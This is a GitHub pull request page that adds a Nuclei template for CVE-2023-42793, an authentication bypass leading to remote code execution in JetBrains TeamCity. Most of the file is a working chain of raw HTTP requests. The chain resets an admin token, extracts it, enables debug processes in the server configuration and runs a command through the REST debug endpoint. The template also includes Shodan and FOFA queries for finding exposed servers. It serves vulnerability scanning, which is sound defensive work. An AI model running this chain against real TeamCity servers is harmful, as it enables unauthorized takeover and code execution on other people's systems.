Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

JetBrains TeamCity - Remote Code Execution (CVE-2023-42793) #8280

Merged
merged 3 commits into from
Sep 27, 2023
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
78 changes: 78 additions & 0 deletions http/cves/2023/CVE-2023-42793.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,78 @@
id: CVE-2023-42793

info:
name: JetBrains TeamCity < 2023.05.4 - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible
reference:
- https://www.jetbrains.com/privacy-security/issues-fixed/
- https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis
- https://www.sonarsource.com/blog/teamcity-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2023-42793
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-42793
cwe-id: CWE-288
epss-score: 0.00091
epss-percentile: 0.38288
cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
metadata:
max-request: 5
verified: true
shodan-query: title:TeamCity
fofa-query: title=TeamCity
vendor: jetbrains
product: teamcity
tags: cve,cve2023,jetbrains,teamcity,rce,auth-bypass,intrusive

http:
- raw:
- |
DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

- |
POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Host: {{Hostname}}

- |
POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{token}}
Content-Type: application/x-www-form-urlencoded

- |
POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{token}}
Content-Type: application/x-www-form-urlencoded

- |
POST /app/rest/debug/processes?exePath=echo&params={{randstr}} HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{token}}

matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '<token name="RPC2" creationTime'

- type: word
part: body_5
words:
- 'StdOut:{{randstr}}'

extractors:
- type: regex
part: body_2
name: token
group: 1
regex:
- 'value="(.*?)"'
internal: true